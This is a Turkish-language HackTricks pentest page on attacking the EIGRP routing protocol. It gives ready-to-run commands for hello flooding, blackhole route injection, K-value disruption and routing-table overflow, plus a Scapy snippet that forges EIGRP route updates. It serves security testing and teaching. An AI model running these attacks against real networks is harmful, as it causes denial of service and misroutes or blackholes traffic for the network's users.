EIGRP Attacks
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking’i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.
Bu, https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 adresinde açıklanan saldırıların bir özetidir. Daha fazla bilgi için inceleyin.
Fake EIGRP Neighbors Attack
- Amaç: Yönlendirici CPU’larını EIGRP hello paketleriyle selleyerek aşırı yüklemek; bu potansiyel olarak Denial of Service (DoS) saldırısına yol açabilir.
- Araç: helloflooding.py script.
- Çalıştırma:
~$ sudo python3 helloflooding.py --interface eth0 --as 1 --subnet 10.10.100.0/24
- Parametreler:
--interface: Ağ arayüzünü belirtir, örn.eth0.--as: EIGRP autonomous system numarasını tanımlar, örn.1.--subnet: Alt ağ konumunu ayarlar, örn.10.10.100.0/24.
EIGRP Blackhole Attack
- Amaç: Yanlış bir rota enjekte ederek ağ trafiğinin akışını bozmak; trafik olmayan bir hedefe yönlendirilerek blackhole oluşmasına yol açmak.
- Araç: routeinject.py script.
- Çalıştırma:
~$ sudo python3 routeinject.py --interface eth0 --as 1 --src 10.10.100.50 --dst 172.16.100.140 --prefix 32
- Parametreler:
--interface: Saldırganın sistem arayüzünü belirtir.--as: EIGRP AS numarasını tanımlar.--src: Saldırganın IP adresini ayarlar.--dst: Hedef alt ağ IP’sini ayarlar.--prefix: Hedef alt ağ IP’sinin maskesini tanımlar.
Abusing K-Values Attack
- Amaç: Değiştirilmiş K-value’ları enjekte ederek EIGRP domain içinde sürekli kesintiler ve yeniden bağlantılar oluşturmak; böylece DoS etkisi yaratmak.
- Araç: relationshipnightmare.py script.
- Çalıştırma:
~$ sudo python3 relationshipnightmare.py --interface eth0 --as 1 --src 10.10.100.100
- Parametreler:
--interface: Ağ arayüzünü belirtir.--as: EIGRP AS numarasını tanımlar.--src: Meşru bir yönlendiricinin IP adresini belirler.
Routing Table Overflow Attack
- Amaç: Çok sayıda sahte rota ile routing tablosunu doldurarak yönlendiricinin CPU ve RAM kaynaklarını zorlamak.
- Araç: routingtableoverflow.py script.
- Çalıştırma:
sudo python3 routingtableoverflow.py --interface eth0 --as 1 --src 10.10.100.50
- Parametreler:
--interface: Ağ arayüzünü belirtir.--as: EIGRP AS numarasını tanımlar.--src: Saldırganın IP adresini ayarlar.
Protocol Notes Useful for Attacks
- HELLO packets carry K-values and neighbors only form when they match. Bu, K-value mismatch/relationship disruption saldırılarının temelidir ve K-value uyuşmazlıklarının adjacency’yi neden engellediğini açıklar.
- The PARAMETER TLV (Type 0x0001) in HELLO (and initial UPDATE) carries K-values and Hold Time, bu yüzden pasif yakalamalar segmentte kullanılan kesin değerleri ortaya çıkarır.
Scapy Packet Crafting (Route Injection / Fake Neighbors)
Scapy, EIGRPParam ve EIGRPIntRoute gibi TLV’leri içeren bir EIGRP contrib layer ile gelir; bu, route injection için UPDATE’ler oluşturmak adına yeterlidir. Örnek, davidbombal/scapy EIGRP route injection script’inden uyarlanmıştır:
from scapy.all import *
load_contrib("eigrp")
sendp(Ether()/IP(src="192.168.1.248", dst="224.0.0.10") /
EIGRP(opcode="Update", asn=100, seq=0, ack=0,
tlvlist=[EIGRPIntRoute(dst="192.168.100.0",
nexthop="192.168.1.248")]))
Aynı repo, gerçek bir EIGRP paketini sniff edip spoofed source IP ile tekrar oynatarak phantom neighbors oluşturan hızlı “fake neighbor” script’leri içerir (CPU/neighbor-table pressure için kullanışlı).
- Scapy EIGRP contrib docs: https://scapy.readthedocs.io/en/latest/api/scapy.contrib.eigrp.html
- Example scripts: https://github.com/davidbombal/scapy
Routopsy & NSE Yardımcıları
- Routopsy sanal bir router attack lab (FRRouting + Scapy) kurar ve EIGRP testleri için uyarlayabileceğiniz DRP saldırılarını içerir. https://sensepost.com/blog/2020/routopsy-hacking-routing-with-routers/
- Nmap’ın NSE’si, EIGRP paketlerinin bir alt kümesini ayrıştırma/üretme için küçük bir
eigrpkütüphanesine sahiptir. https://nmap.org/nsedoc/lib/eigrp.html
Kimlik Doğrulama Keşfi
- EIGRP named mode, HMAC-SHA-256 authentication’ı
authentication mode hmac-sha-256 ...ile destekler. Etkinse, hazırlanan paketlerin doğru anahtarla doğrulanması gerekir; etkin değilse, spoofing/injection doğrulaması daha kolaydır.
Kaynaklar
- https://www.rfc-editor.org/rfc/rfc7868.html
- https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_eigrp/configuration/15-mt/ire-15-mt-book/ire-sha-256.html
Tip
AWS Hacking’i öğrenin ve pratik yapın:
HackTricks Training AWS Red Team Expert (ARTE)
GCP Hacking’i öğrenin ve pratik yapın:HackTricks Training GCP Red Team Expert (GRTE)
Azure Hacking’i öğrenin ve pratik yapın:
HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks'i Destekleyin
- abonelik planlarını kontrol edin!
- 💬 Discord grubuna veya telegram grubuna katılın ya da Twitter’da bizi takip edin 🐦 @hacktricks_live.**
- Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.


